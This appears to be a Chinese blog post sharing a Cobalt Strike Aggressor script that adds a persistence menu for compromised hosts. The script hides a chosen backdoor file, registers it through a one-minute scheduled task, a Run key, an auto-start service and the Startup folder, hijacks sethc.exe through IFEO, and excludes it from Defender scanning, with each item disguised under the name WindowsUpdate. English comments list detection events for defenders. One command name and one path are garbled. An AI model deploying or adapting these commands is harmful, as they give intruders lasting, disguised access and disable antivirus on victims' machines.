CobaltStrike插件编写(1)-权限维持

自嘲:今天打开博客园一看,好家伙我竟然还有账户,原来我注册了博客园啊。

CobaltStrike插件-权限维持模块

方法都是网上常见的,正好在学怎么写插件,练手之作,大佬勿喷。

# Aggressor script: adds a "权限维持" (persistence) submenu to the Beacon context menu.
# Every item below runs a command through the selected beacon(s). None of them check
# whether $filePath has been set first, so running an item before "设置后门文件路径"
# presumably interpolates an empty value into the command string.
# Defender view: each item leaves a host artifact under the same fixed, benign-looking
# name ("WindowsUpdate") or a hard-coded path; the detection hook for each is noted inline.
popup beacon_bottom {
	menu "权限维持" {

		# Prompts the operator for a file path and stores it in the script-global
		# $filePath, which every other item interpolates into its command line.
		# $1 inside the callback is the text entered in the dialog.
		item "设置后门文件路径" {
			local('$bid');
			foreach $bid ($1){
				prompt_text("filePath", $filePath, {
					$filePath = $1;
					return $filePath;
				});
			}
		}


		# Sets the System and Hidden attributes on $filePath via attrib.exe.
		# Detection: attrib.exe invoked with "+s +h" from a cmd spawned by the beacon
		# process; a +s file outside %SystemRoot% is itself a hunt lead.
		item "隐藏文件" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "attrib "$filePath" +s +h");
			}
		}


		# Scheduled task named WindowsUpdate that launches $filePath every minute.
		# Detection: Security event 4698 (task created) / TaskScheduler operational log;
		# a one-minute MINUTE trigger on a task with a Windows-sounding name is high-signal.
		item "定时任务" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "schtasks /create /tn WindowsUpdate /tr "$filePath" /sc minute /mo 1");
			}
		}

		# HKLM Run-key value WindowsUpdate pointing at $filePath (machine-wide autostart).
		# Detection: Sysmon event 13 (registry value set) on the CurrentVersion\Run key,
		# or an Autoruns baseline diff.
		item "注册表"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "$filePath" /f");
			}
		}

		# Creates a service named WindowsUpdate whose binpath is "cmd /c start <$filePath>",
		# sets it to auto-start, and starts it immediately (three commands chained with &&).
		# Detection: System event 7045 / Security event 4697 (new service installed);
		# a service ImagePath beginning with cmd.exe is a classic persistence tell.
		item "SC服务"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "sc create "WindowsUpdate" binpath= "cmd /c start "$filePath""&&sc config "WindowsUpdate" start= auto&&net start WindowsUpdate");

			}
		}

		# Copies $filePath into the Administrator account's Startup folder as WindowsUpdate.exe,
		# then hides it. The profile path is hard-coded to C:\Users\Administrator, so it only
		# applies to that one user profile.
		# Detection: file creation under any ...\Start Menu\Programs\Startup\ directory
		# (Sysmon event 11), especially followed by attrib +s +h on the same file.
		item "自启动目录"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "copy "$filePath" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y");
				bshell($1, "attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +s +h");
			}
		}
		
		# Image File Execution Options hijack of Sethc.exe: writes a Debugger value under
		# the IFEO key (path literal as printed on the page), then adds a WindowsUpdate
		# task that launches sethc.exe every minute so the Debugger target gets invoked.
		# Note this item does not use $filePath; its payload path is hard-coded.
		# Detection: any Debugger value under IFEO for an accessibility binary
		# (sethc.exe, utilman.exe, ...) should be alerted on — Sysmon event 13 on that key.
		item "映像劫持"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe /f");
				bshell($1, "reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe /v Debugger /t REG_SZ /d "C:UsersAdministratorDesktopartifact.exe" /f");
				bshell($1, "schtasks /create /tn WindowsUpdate /tr C:WindowsSystem32sethc.exe /sc minute /mo 1");
			}
		}
		
		# Adds $filePath to the Microsoft Defender exclusion list via Set-MpPreference
		# (function name called exactly as written on the page).
		# Detection: Windows Defender operational log event 5007 (configuration changed)
		# and PowerShell script-block logging for Set-MpPreference -ExclusionPath.
		item "添加Defend排除项"{
			local('$bid');
			foreach $bid ($1){
				bpoershell($1, "Set-MpPreference -ExclusionPath "$filePath" ");
			}
		}
	}
}
原文地址:https://www.cnblogs.com/Secde0/p/14969777.html